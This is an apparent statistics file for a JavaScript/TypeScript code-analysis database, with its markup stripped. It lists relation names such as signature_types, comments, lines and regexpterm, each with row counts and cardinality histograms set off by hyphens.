-15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -index - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -kind - - -12 - - -1 -2 -44603 - - -2 -4 -526 - - - - - - -parent -tostring - - -12 - - -1 -2 -15770 - - -2 -3 -17763 - - -3 -4 -4692 - - -4 -6 -3759 - - -6 -4173 -3145 - - - - - - -index -id - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -parent - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -kind - - -12 - - -1 -2 -4149 - - -2 -4 -55 - - - - - - -index -tostring - - -12 - - -1 -2 -2827 - - -2 -3 -364 - - -3 -5 -358 - - -5 -7 -337 - - -7 -6233 -316 - - -16744 -16747 -2 - - - - - - -kind -id - - -12 - - -338 -339 -1 - - -1529 -1530 -1 - - -140856 -140857 -1 - - - - - - -kind -parent - - -12 - - -204 -205 -1 - - -523 -524 -1 - - -45034 -45035 -1 - - - - - - -kind -index - - -12 - - -36 -37 -1 - - -55 -56 -1 - - -4204 -4205 -1 - - - - - - -kind -tostring - - -12 - - -174 -175 -1 - - -880 -881 -1 - - -66649 -66650 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -46301 - - -2 -3 -13295 - - -3 -6 -5112 - - -6 -2975 -2995 - - - - - - -tostring -parent - - -12 - - -1 -2 -46926 - - -2 -3 -13013 - - -3 -7 -5466 - - -7 -2975 -2298 - - - - - - -tostring -index - - -12 - - -1 -2 -61480 - - -2 -4 -5275 - - -4 -43 -948 - - - - - - -tostring -kind - - -12 - - -1 -2 -67703 - - - - - - - - -is_computed -27 - - -id -27 - - - - - -is_method -392 - - -id -392 - - - - - -is_static -36 - - -id -36 - - - - - -type_alias -1386 - - -aliasType -1386 - - -underlyingType -1361 - - - - -underlyingType -aliasType - - -12 - - -1 -2 -1 - - - - - - -aliasType -underlyingType - - -12 - - -1 -2 -1 - - - - - - - - -type_literal_value -31882 - - -typ -31882 - - -value -31828 - - - - -typ -value - - -12 - - -1 -2 -31882 - - - - - - -value -typ - - -12 - - -1 -2 -31774 - - -2 -3 -54 - - - - - - - - -signature_types -46921 - - -id -46921 - - -kind -2 - - -tostring -27460 - - -type_parameters -11 - - -required_params -22 - - - - -id -kind - - -12 - - -1 -2 -46921 - - - - - - -id -tostring - - -12 - - -1 -2 -46921 - - - - - - -id -type_parameters - - -12 - - -1 -2 -46921 - - - - - - -id -required_params - - -12 - - -1 -2 -46921 - - - - - - -kind -id - - -12 - - -2639 -2640 -1 - - -44282 -44283 -1 - - - - - - -kind -tostring - - -12 - - -2200 -2201 -1 - - -25260 -25261 -1 - - - - - - -kind -type_parameters - - -12 - - -4 -5 -1 - - -11 -12 -1 - - - - - - -kind -required_params - - -12 - - -18 -19 -1 - - -19 -20 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22069 - - -2 -3 -3061 - - -3 -13 -2112 - - -13 -277 -218 - - - - - - -tostring -kind - - -12 - - -1 -2 -27460 - - - - - - -tostring -type_parameters - - -12 - - -1 -2 -27459 - - -2 -3 -1 - - - - - - -tostring -required_params - - -12 - - -1 -2 -27134 - - -2 -10 -326 - - - - - - -type_parameters -id - - -12 - - -1 -2 -1 - - -13 -14 -1 - - -25 -26 -1 - - -34 -35 -1 - - -42 -43 -1 - - -51 -52 -1 - - -74 -75 -1 - - -139 -140 -1 - - -274 -275 -1 - - -5367 -5368 -1 - - -40901 -40902 -1 - - - - - - -type_parameters -kind - - -12 - - -1 -2 -7 - - -2 -3 -4 - - - - - - -type_parameters -tostring - - -12 - - -1 -2 -1 - - -5 -6 -1 - - -6 -7 -2 - - -8 -9 -2 - - -17 -18 -1 - - -18 -19 -1 - - -158 -159 -1 - - -1805 -1806 -1 - - -25429 -25430 -1 - - - - - - -type_parameters -required_params - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -2 - - -7 -8 -1 - - -8 -9 -2 - - -9 -10 -1 - - -22 -23 -1 - - - - - - -required_params -id - - -12 - - -1 -2 -4 - - -2 -3 -2 - - -3 -5 -2 - - -5 -11 -2 - - -11 -12 -2 - - -44 -131 -2 - - -197 -373 -2 - - -645 -2439 -2 - - -2783 -6853 -2 - - -16407 -17002 -2 - - - - - - -required_params -kind - - -12 - - -1 -2 -7 - - -2 -3 -15 - - - - - - -required_params -tostring - - -12 - - -1 -2 -4 - - -2 -3 -3 - - -4 -5 -1 - - -5 -6 -2 - - -9 -12 -2 - - -39 -62 -2 - - -112 -205 -2 - - -432 -1404 -2 - - -1813 -3662 -2 - - -8431 -11659 -2 - - - - - - -required_params -type_parameters - - -12 - - -1 -2 -12 - - -2 -3 -1 - - -3 -4 -2 - - -5 -7 -2 - - -8 -10 -2 - - -10 -11 -2 - - -11 -12 -1 - - - - - - - - -is_abstract_signature -12 - - -sig -12 - - - - - -signature_rest_parameter -19521 - - -sig -19521 - - -rest_param_arra_type -14259 - - - - -rest_param_arra_type -sig - - -12 - - -1 -2 -1 - - - - - - -sig -rest_param_arra_type - - -12 - - -1 -2 -1 - - - - - - - - -type_contains_signature -87640 - - -typ -68964 - - -kind -2 - - -index -247 - - -sig -37344 - - - - -typ -kind - - -12 - - -1 -2 -68938 - - -2 -3 -26 - - - - - - -typ -index - - -12 - - -1 -2 -59150 - - -2 -3 -5394 - - -3 -248 -4420 - - - - - - -typ -sig - - -12 - - -1 -2 -60034 - - -2 -3 -4557 - - -3 -248 -4373 - - - - - - -kind -typ - - -12 - - -2582 -2583 -1 - - -66408 -66409 -1 - - - - - - -kind -index - - -12 - - -6 -7 -1 - - -247 -248 -1 - - - - - - -kind -sig - - -12 - - -2646 -2647 -1 - - -34698 -34699 -1 - - - - - - -index -typ - - -12 - - -1 -2 -198 - - -2 -3 -21 - - -3 -265 -19 - - -449 -42171 -9 - - - - - - -index -kind - - -12 - - -1 -2 -241 - - -2 -3 -6 - - - - - - -index -sig - - -12 - - -1 -2 -198 - - -2 -3 -24 - - -3 -90 -19 - - -309 -31688 -6 - - - - - - -sig -typ - - -12 - - -1 -2 -35114 - - -2 -896 -2230 - - - - - - -sig -kind - - -12 - - -1 -2 -37344 - - - - - - -sig -index - - -12 - - -1 -2 -36489 - - -2 -9 -855 - - - - - - - - -signature_contains_type -107012 - - -child -26824 - - -parent -37344 - - -index -21 - - - - -child -parent - - -12 - - -1 -2 -19848 - - -2 -3 -3736 - - -3 -7 -2017 - - -7 -10275 -1223 - - - - - - -child -index - - -12 - - -1 -2 -22572 - - -2 -3 -3289 - - -3 -22 -963 - - - - - - -parent -child - - -12 - - -1 -2 -3594 - - -2 -3 -18463 - - -3 -4 -10057 - - -4 -5 -3906 - - -5 -11 -1324 - - - - - - -parent -index - - -12 - - -1 -2 -2649 - - -2 -3 -14810 - - -3 -4 -12007 - - -4 -5 -4294 - - -5 -8 -3055 - - -8 -22 -529 - - - - - - -index -child - - -12 - - -1 -2 -2 - - -2 -3 -6 - - -3 -4 -1 - - -5 -6 -1 - - -9 -10 -1 - - -18 -19 -1 - - -106 -107 -1 - - -313 -314 -1 - - -455 -456 -1 - - -643 -644 -1 - - -1088 -1089 -1 - - -2051 -2052 -1 - - -6862 -6863 -1 - - -8789 -8790 -1 - - -12289 -12290 -1 - - - - - - -index -parent - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - -37344 -37345 -1 - - - - - - - - -signature_parameter_name -69668 - - -sig -34695 - - -index -20 - - -name -4071 - - - - -sig -index - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -sig -name - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -index -sig - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - - - - - -index -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -2 - - -11 -12 -1 - - -16 -17 -1 - - -18 -19 -1 - - -24 -25 -1 - - -30 -31 -1 - - -45 -46 -1 - - -63 -64 -1 - - -116 -117 -1 - - -188 -189 -1 - - -344 -345 -1 - - -605 -606 -1 - - -1092 -1093 -1 - - -1741 -1742 -1 - - -2122 -2123 -1 - - - - - - -name -sig - - -12 - - -1 -2 -1898 - - -2 -3 -700 - - -3 -4 -294 - - -4 -5 -262 - - -5 -8 -310 - - -8 -24 -309 - - -24 -3588 -298 - - - - - - -name -index - - -12 - - -1 -2 -2804 - - -2 -3 -738 - - -3 -4 -290 - - -4 -15 -239 - - - - - - - - -number_index_type -2038 - - -baseType -2038 - - -propertyType -517 - - - - -baseType -propertyType - - -12 - - -1 -2 -2038 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -435 - - -2 -3 -70 - - -3 -1259 -12 - - - - - - - - -string_index_type -1102 - - -baseType -1102 - - -propertyType -256 - - - - -baseType -propertyType - - -12 - - -1 -2 -1102 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -219 - - -2 -3 -20 - - -3 -436 -17 - - - - - - - - -base_type_names -941 - - -typeName -928 - - -baseTypeName -369 - - - - -typeName -baseTypeName - - -12 - - -1 -2 -917 - - -2 -4 -11 - - - - - - -baseTypeName -typeName - - -12 - - -1 -2 -175 - - -2 -3 -101 - - -3 -4 -29 - - -4 -5 -29 - - -5 -11 -28 - - -15 -41 -7 - - - - - - - - -self_types -19632 - - -typeName -14119 - - -selfType -19632 - - - - -typeName -selfType - - -12 - - -1 -2 -10451 - - -2 -3 -1823 - - -3 -4 -1845 - - - - - - -selfType -typeName - - -12 - - -1 -2 -19632 - - - - - - - - -tuple_type_min_length -241 - - -typ -241 - - -minLength -10 - - - - -typ -minLength - - -12 - - -1 -2 -241 - - - - - - -minLength -typ - - -12 - - -2 -3 -3 - - -3 -4 -1 - - -4 -5 -1 - - -7 -8 -1 - - -20 -21 -1 - - -42 -43 -1 - - -66 -67 -1 - - -93 -94 -1 - - - - - - - - -tuple_type_rest_index -6 - - -typ -6 - - -index -2 - - - - -typ -index - - -12 - - -1 -2 -6 - - - - - - -index -typ - - -12 - - -1 -2 -1 - - -5 -6 -1 - - - - - - - - -comments -id -104947 - - -id -104947 - - -kind -5 - - -toplevel -4497 - - -text -73454 - - -tostring -57955 - - - - -id -kind - - -12 - - -1 -2 -104947 - - - - - - -id -toplevel - - -12 - - -1 -2 -104947 - - - - - - -id -text - - -12 - - -1 -2 -104947 - - - - - - -id -tostring - - -12 - - -1 -2 -104947 - - - - - - -kind -id - - -12 - - -1 -2 -2 - - -8834 -8835 -1 - - -19270 -19271 -1 - - -76841 -76842 -1 - - - - - - -kind -toplevel - - -12 - - -1 -2 -2 - - -1705 -1706 -1 - - -3107 -3108 -1 - - -3141 -3142 -1 - - - - - - -kind -text - - -12 - - -1 -2 -2 - - -4893 -4894 -1 - - -12759 -12760 -1 - - -55810 -55811 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -2 - - -1739 -1740 -1 - - -2536 -2537 -1 - - -53678 -53679 -1 - - - - - - -toplevel -id - - -12 - - -1 -2 -1034 - - -2 -3 -512 - - -3 -4 -332 - - -4 -5 -260 - - -5 -7 -388 - - -7 -10 -401 - - -10 -14 -354 - - -14 -21 -365 - - -21 -36 -338 - - -36 -99 -339 - - -99 -6350 -174 - - - - - - -toplevel -kind - - -12 - - -1 -2 -1856 - - -2 -3 -1824 - - -3 -4 -817 - - - - - - -toplevel -text - - -12 - - -1 -2 -1043 - - -2 -3 -533 - - -3 -4 -341 - - -4 -5 -266 - - -5 -7 -396 - - -7 -9 -315 - - -9 -13 -388 - - -13 -20 -385 - - -20 -35 -344 - - -35 -103 -344 - - -103 -4413 -142 - - - - - - -toplevel -tostring - - -12 - - -1 -2 -1054 - - -2 -3 -571 - - -3 -4 -374 - - -4 -5 -297 - - -5 -6 -232 - - -6 -8 -363 - - -8 -11 -345 - - -11 -16 -366 - - -16 -27 -352 - - -27 -60 -338 - - -60 -4394 -205 - - - - - - -text -id - - -12 - - -1 -2 -59626 - - -2 -3 -10314 - - -3 -1417 -3514 - - - - - - -text -kind - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -text -toplevel - - -12 - - -1 -2 -62696 - - -2 -3 -8455 - - -3 -257 -2303 - - - - - - -text -tostring - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -tostring -id - - -12 - - -1 -2 -44781 - - -2 -3 -9203 - - -3 -4589 -3971 - - - - - - -tostring -kind - - -12 - - -1 -2 -57955 - - - - - - -tostring -toplevel - - -12 - - -1 -2 -48252 - - -2 -3 -7233 - - -3 -513 -2470 - - - - - - -tostring -text - - -12 - - -1 -2 -55262 - - -2 -3403 -2693 - - - - - - - - -types -179398 - - -id -179398 - - -kind -9 - - -tostring -40918 - - - - -id -kind - - -12 - - -1 -2 -179398 - - - - - - -id -tostring - - -12 - - -1 -2 -179398 - - - - - - -kind -id - - -12 - - -1 -2 -5 - - -1802 -1803 -1 - - -6109 -6110 -1 - - -12383 -12384 -1 - - -159099 -159100 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -50 -51 -1 - - -745 -746 -1 - - -7464 -7465 -1 - - -32936 -32937 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22482 - - -2 -3 -8025 - - -3 -4 -3362 - - -4 -7 -3387 - - -7 -33 -3070 - - -33 -7284 -592 - - - - - - -tostring -kind - - -12 - - -1 -2 -40638 - - -2 -4 -280 - - - - - - - - -type_child -17410 - - -child -9118 - - -parent -7772 - - -idx -296 - - - - -child -parent - - -12 - - -1 -2 -7113 - - -2 -3 -978 - - -3 -8 -686 - - -8 -199 -341 - - - - - - -child -idx - - -12 - - -1 -2 -8255 - - -2 -5 -726 - - -5 -19 -137 - - - - - - -parent -child - - -12 - - -1 -2 -5433 - - -2 -3 -1746 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -parent -idx - - -12 - - -1 -2 -5422 - - -2 -3 -1757 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -idx -child - - -12 - - -1 -2 -1 - - -2 -3 -39 - - -3 -4 -3 - - -4 -5 -61 - - -5 -6 -37 - - -6 -7 -56 - - -7 -12 -22 - - -12 -14 -18 - - -14 -15 -44 - - -17 -6068 -15 - - - - - - -idx -parent - - -12 - - -2 -15 -13 - - -15 -16 -90 - - -19 -20 -81 - - -20 -23 -3 - - -23 -24 -75 - - -24 -55 -23 - - -55 -7773 -11 - - - - - - - - -ast_node_type -1261889 - - -node -1261889 - - -typ -72602 - - - - -node -typ - - -12 - - -1 -2 -1261889 - - - - - - -typ -node - - -12 - - -1 -2 -39248 - - -2 -3 -8371 - - -3 -4 -7888 - - -4 -5 -3053 - - -5 -8 -6417 - - -8 -28 -5528 - - -28 -588233 -2097 - - - - - - - - -declared_function_signature -62664 - - -node -62664 - - -sig -21731 - - - - -node -sig - - -12 - - -1 -2 -62664 - - - - - - -sig -node - - -12 - - -1 -2 -16826 - - -2 -3 -2358 - - -3 -6 -1683 - - -6 -10251 -864 - - - - - - - - -invoke_expr_signature -140668 - - -node -140668 - - -sig -9111 - - - - -node -sig - - -12 - - -1 -2 -140668 - - - - - - -sig -node - - -12 - - -1 -2 -4612 - - -2 -3 -1819 - - -3 -4 -737 - - -4 -6 -696 - - -6 -14 -705 - - -14 -68351 -542 - - - - - - - - -invoke_expr_overload_index -73550 - - -node -73550 - - -index -47 - - - - -node -index - - -12 - - -1 -2 -73550 - - - - - - -index -node - - -12 - - -1 -2 -17 - - -2 -3 -7 - - -3 -5 -4 - - -5 -6 -4 - - -6 -8 -3 - - -8 -16 -4 - - -27 -155 -4 - - -211 -68535 -4 - - - - - - - - -symbols -10192 - - -id -10192 - - -kind -3 - - -name -7872 - - - - -id -kind - - -12 - - -1 -2 -10192 - - - - - - -id -name - - -12 - - -1 -2 -10192 - - - - - - -kind -id - - -12 - - -584 -585 -1 - - -2385 -2386 -1 - - -7223 -7224 -1 - - - - - - -kind -name - - -12 - - -30 -31 -1 - - -2385 -2386 -1 - - -5609 -5610 -1 - - - - - - -name -id - - -12 - - -1 -2 -6929 - - -2 -3 -533 - - -3 -273 -410 - - - - - - -name -kind - - -12 - - -1 -2 -7730 - - -2 -4 -142 - - - - - - - - -symbol_parent -7807 - - -symbol -7807 - - -parent -1727 - - - - -symbol -parent - - -12 - - -1 -2 -7807 - - - - - - -parent -symbol - - -12 - - -1 -2 -778 - - -2 -3 -304 - - -3 -4 -212 - - -4 -5 -111 - - -5 -8 -152 - - -8 -26 -136 - - -26 -297 -34 - - - - - - - - -symbol_module -100 - - -symbol -97 - - -moduleName -98 - - - - -symbol -moduleName - - -12 - - -1 -2 -95 - - -2 -4 -2 - - - - - - -moduleName -symbol - - -12 - - -1 -2 -96 - - -2 -3 -2 - - - - - - - - -symbol_global -354 - - -symbol -354 - - -globalName -350 - - - - -symbol -globalName - - -12 - - -1 -2 -354 - - - - - - -globalName -symbol - - -12 - - -1 -2 -347 - - -2 -4 -3 - - - - - - - - -ast_node_symbol -8173 - - -node -8173 - - -symbol -8155 - - - - -node -symbol - - -12 - - -1 -2 -8173 - - - - - - -symbol -node - - -12 - - -1 -2 -8147 - - -2 -12 -8 - - - - - - - - -type_symbol -12383 - - -typ -12383 - - -symbol -6743 - - - - -typ -symbol - - -12 - - -1 -2 -12383 - - - - - - -symbol -typ - - -12 - - -1 -2 -6240 - - -2 -3070 -503 - - - - - - - - -type_property -331170 - - -typ -49305 - - -name -22420 - - -propertyType -130857 - - - - -typ -name - - -12 - - -1 -2 -10275 - - -2 -3 -14770 - - -3 -4 -6020 - - -4 -5 -3153 - - -5 -6 -1700 - - -6 -7 -4257 - - -7 -19 -3783 - - -19 -23 -3833 - - -23 -1390 -1514 - - - - - - -typ -propertyType - - -12 - - -1 -2 -19351 - - -2 -3 -10786 - - -3 -4 -5073 - - -4 -6 -2639 - - -6 -7 -3864 - - -7 -22 -3334 - - -22 -33 -3710 - - -33 -1390 -548 - - - - - - -name -typ - - -12 - - -1 -2 -4735 - - -2 -3 -7379 - - -3 -4 -2728 - - -4 -5 -1467 - - -5 -7 -1481 - - -7 -11 -1878 - - -11 -30 -1682 - - -30 -7825 -1070 - - - - - - -name -propertyType - - -12 - - -1 -2 -14690 - - -2 -3 -2698 - - -3 -4 -1925 - - -4 -8 -1697 - - -8 -3373 -1410 - - - - - - -propertyType -typ - - -12 - - -1 -2 -112801 - - -2 -3 -12999 - - -3 -19440 -5057 - - - - - - -propertyType -name - - -12 - - -1 -2 -129508 - - -2 -3475 -1349 - - - - - - - - -lines -id -1622184 - - -id -1622184 - - -toplevel -5312 - - -text -648122 - - -terminator -6 - - - - -id -toplevel - - -12 - - -1 -2 -1622184 - - - - - - -id -text - - -12 - - -1 -2 -1622184 - - - - - - -id -terminator - - -12 - - -1 -2 -1622184 - - - - - - -toplevel -id - - -12 - - -1 -12 -425 - - -12 -24 -415 - - -24 -37 -419 - - -37 -50 -404 - - -50 -66 -411 - - -66 -85 -400 - - -85 -108 -405 - - -108 -138 -402 - - -138 -174 -402 - - -174 -232 -405 - - -232 -331 -399 - - -331 -547 -399 - - -548 -4700 -399 - - -4783 -277404 -27 - - - - - - -toplevel -text - - -12 - - -1 -11 -441 - - -11 -21 -427 - - -21 -30 -414 - - -30 -40 -452 - - -40 -51 -435 - - -51 -64 -413 - - -64 -79 -404 - - -79 -96 -401 - - -96 -121 -400 - - -121 -158 -401 - - -158 -220 -399 - - -220 -387 -401 - - -388 -60934 -324 - - - - - - -toplevel -terminator - - -12 - - -1 -2 -5046 - - -2 -6 -266 - - - - - - -text -id - - -12 - - -1 -2 -513961 - - -2 -3 -84265 - - -3 -49 -48993 - - -49 -175121 -903 - - - - - - -text -toplevel - - -12 - - -1 -2 -569267 - - -2 -3 -56143 - - -3 -5068 -22712 - - - - - - -text -terminator - - -12 - - -1 -2 -647931 - - -2 -4 -191 - - - - - - -terminator -id - - -12 - - -3 -4 -3 - - -349 -350 -1 - - -1830 -1831 -1 - - -1619996 -1619997 -1 - - - - - - -terminator -toplevel - - -12 - - -3 -4 -3 - - -11 -12 -1 - - -349 -350 -1 - - -5218 -5219 -1 - - - - - - -terminator -text - - -12 - - -1 -2 -3 - - -110 -111 -1 - - -1093 -1094 -1 - - -647111 -647112 -1 - - - - - - - - -indentation -1145010 - - -file -5728 - - -lineno -40788 - - -indentChar -2 - - -indentDepth -72 - - - - -file -lineno - - -12 - - -1 -9 -440 - - -9 -18 -471 - - -18 -29 -439 - - -29 -41 -451 - - -41 -54 -460 - - -54 -71 -442 - - -71 -91 -441 - - -91 -118 -430 - - -118 -152 -432 - - -152 -205 -434 - - -205 -295 -431 - - -295 -503 -430 - - -503 -38151 -427 - - - - - - -file -indentChar - - -12 - - -1 -2 -5692 - - -2 -3 -36 - - - - - - -file -indentDepth - - -12 - - -1 -2 -287 - - -2 -3 -401 - - -3 -4 -665 - - -4 -5 -815 - - -5 -6 -814 - - -6 -7 -687 - - -7 -8 -567 - - -8 -9 -390 - - -9 -11 -503 - - -11 -17 -462 - - -17 -67 -137 - - - - - - -lineno -file - - -12 - - -1 -2 -10935 - - -2 -3 -5303 - - -3 -4 -12061 - - -4 -6 -3644 - - -6 -13 -3223 - - -13 -31 -3090 - - -31 -3986 -2532 - - - - - - -lineno -indentChar - - -12 - - -1 -2 -38720 - - -2 -3 -2068 - - - - - - -lineno -indentDepth - - -12 - - -1 -2 -11626 - - -2 -3 -7847 - - -3 -4 -10434 - - -4 -5 -2688 - - -5 -8 -3316 - - -8 -13 -3144 - - -13 -39 -1733 - - - - - - -indentChar -file - - -12 - - -42 -43 -1 - - -5722 -5723 -1 - - - - - - -indentChar -lineno - - -12 - - -2068 -2069 -1 - - -40788 -40789 -1 - - - - - - -indentChar -indentDepth - - -12 - - -10 -11 -1 - - -72 -73 -1 - - - - - - -indentDepth -file - - -12 - - -1 -6 -6 - - -6 -9 -6 - - -9 -20 -6 - - -21 -30 -6 - - -38 -57 -6 - - -59 -90 -6 - - -90 -124 -6 - - -132 -160 -6 - - -165 -211 -6 - - -213 -337 -6 - - -377 -1532 -6 - - -1919 -5487 -6 - - - - - - -indentDepth -lineno - - -12 - - -2 -8 -6 - - -11 -19 -6 - - -25 -44 -6 - - -53 -67 -6 - - -67 -89 -6 - - -102 -169 -6 - - -183 -239 -6 - - -269 -411 -6 - - -417 -971 -6 - - -1129 -2732 -6 - - -4374 -9301 -6 - - -11828 -21226 -6 - - - - - - -indentDepth -indentChar - - -12 - - -1 -2 -62 - - -2 -3 -10 - - - - - - - - -js_parse_errors -3 - - -id -3 - - -toplevel -3 - - -message -1 - - -line -3 - - - - -id -toplevel - - -12 - - -1 -2 -3 - - - - - - -id -message - - -12 - - -1 -2 -3 - - - - - - -id -line - - -12 - - -1 -2 -3 - - - - - - -toplevel -id - - -12 - - -1 -2 -3 - - - - - - -toplevel -message - - -12 - - -1 -2 -3 - - - - - - -toplevel -line - - -12 - - -1 -2 -3 - - - - - - -message -id - - -12 - - -3 -4 -1 - - - - - - -message -toplevel - - -12 - - -3 -4 -1 - - - - - - -message -line - - -12 - - -3 -4 -1 - - - - - - -line -id - - -12 - - -1 -2 -3 - - - - - - -line -toplevel - - -12 - - -1 -2 -3 - - - - - - -line -message - - -12 - - -1 -2 -3 - - - - - - - - -regexpterm -id -33197 - - -id -33197 - - -kind -25 - - -parent -13313 - - -idx -76 - - -tostring -4610 - - - - -id -kind - - -12 - - -1 -2 -33197 - - - - - - -id -parent - - -12 - - -1 -2 -33197 - - - - - - -id -idx - - -12 - - -1 -2 -33197 - - - - - - -id -tostring - - -12 - - -1 -2 -33197 - - - - - - -kind -id - - -12 - - -1 -4 -2 - - -7 -12 -2 - - -12 -16 -2 - - -59 -100 -2 - - -146 -265 -2 - - -445 -479 -2 - - -599 -620 -2 - - -637 -642 -2 - - -826 -1058 -2 - - -1067 -1474 -2 - - -1573 -1693 -2 - - -2613 -3372 -2 - - -15489 -15490 -1 - - - - - - -kind -parent - - -12 - - -1 -4 -2 - - -7 -8 -1 - - -11 -12 -2 - - -15 -46 -2 - - -79 -132 -2 - - -132 -331 -2 - - -367 -381 -2 - - -437 -638 -2 - - -641 -737 -2 - - -825 -1005 -2 - - -1391 -1403 -2 - - -1465 -1645 -2 - - -2691 -3963 -2 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -3 - - -6 -8 -2 - - -12 -15 -2 - - -17 -19 -2 - - -19 -21 -2 - - -22 -23 -1 - - -23 -24 -2 - - -25 -27 -2 - - -27 -30 -2 - - -42 -49 -2 - - -73 -74 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -6 - - -2 -5 -2 - - -6 -11 -2 - - -13 -28 -2 - - -31 -59 -2 - - -65 -78 -2 - - -100 -118 -2 - - -149 -171 -2 - - -175 -391 -2 - - -433 -791 -2 - - -1992 -1993 -1 - - - - - - -parent -id - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -kind - - -12 - - -1 -2 -10080 - - -2 -3 -2026 - - -3 -5 -1068 - - -5 -9 -139 - - - - - - -parent -idx - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -tostring - - -12 - - -1 -2 -7733 - - -2 -3 -2644 - - -3 -4 -940 - - -4 -7 -1230 - - -7 -32 -766 - - - - - - -idx -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -kind - - -12 - - -1 -2 -18 - - -2 -3 -15 - - -3 -4 -8 - - -4 -5 -7 - - -5 -8 -6 - - -9 -13 -6 - - -13 -16 -7 - - -17 -20 -7 - - -21 -25 -2 - - - - - - -idx -parent - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -tostring - - -12 - - -1 -2 -8 - - -2 -3 -8 - - -3 -4 -4 - - -5 -7 -6 - - -7 -10 -6 - - -10 -15 -6 - - -16 -21 -7 - - -21 -26 -6 - - -29 -48 -6 - - -48 -75 -6 - - -82 -147 -6 - - -158 -940 -6 - - -3258 -3259 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -3026 - - -2 -3 -751 - - -3 -5 -391 - - -5 -49 -346 - - -49 -1013 -96 - - - - - - -tostring -kind - - -12 - - -1 -2 -4605 - - -2 -3 -5 - - - - - - -tostring -parent - - -12 - - -1 -2 -3041 - - -2 -3 -746 - - -3 -5 -389 - - -5 -53 -346 - - -54 -875 -88 - - - - - - -tostring -idx - - -12 - - -1 -2 -4102 - - -2 -5 -351 - - -5 -58 -157 - - - - - - - - -regexp_parse_errors -id -122 - - -id -122 - - -regexp -41 - - -message -5 - - - - -id -regexp - - -12 - - -1 -2 -122 - - - - - - -id -message - - -12 - - -1 -2 -122 - - - - - - -regexp -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -3 -4 -12 - - -4 -5 -5 - - -5 -6 -7 - - -6 -7 -1 - - - - - - -regexp -message - - -12 - - -1 -2 -18 - - -2 -3 -4 - - -3 -4 -19 - - - - - - -message -id - - -12 - - -1 -2 -1 - - -8 -9 -1 - - -22 -23 -1 - - -23 -24 -1 - - -68 -69 -1 - - - - - - -message -regexp - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -22 -23 -1 - - -23 -24 -1 - - -35 -36 -1 - - - - - - - - -is_greedy -2629 - - -id -2629 - - - - - -isOptionalChaining -100 - - -id -100 - - - - - - -range_quantifier_lower_bound -146 - - -id -146 - - -lo -11 - - - - -id -lo - - -12 - - -1 -2 -146 - - - - - - -lo -id - - -12 - - -1 -2 -4 - - -4 -5 -1 - - -5 -6 -1 - - -17 -18 -1 - - -20 -21 -1 - - -28 -29 -1 - - -33 -34 -1 - - -35 -36 -1 - - - - - - - - -range_quantifier_upper_bound -45 - - -id -45 - - -hi -13 - - - - -id -hi - - -12 - - -1 -2 -45 - - - - - - -hi -id - - -12 - - -1 -2 -5 - - -2 -3 -3 - - -3 -4 -2 - - -8 -9 -1 - - -9 -10 -1 - - -11 -12 -1 - - - - - - - - -is_capture -1280 - - -id -1280 - - 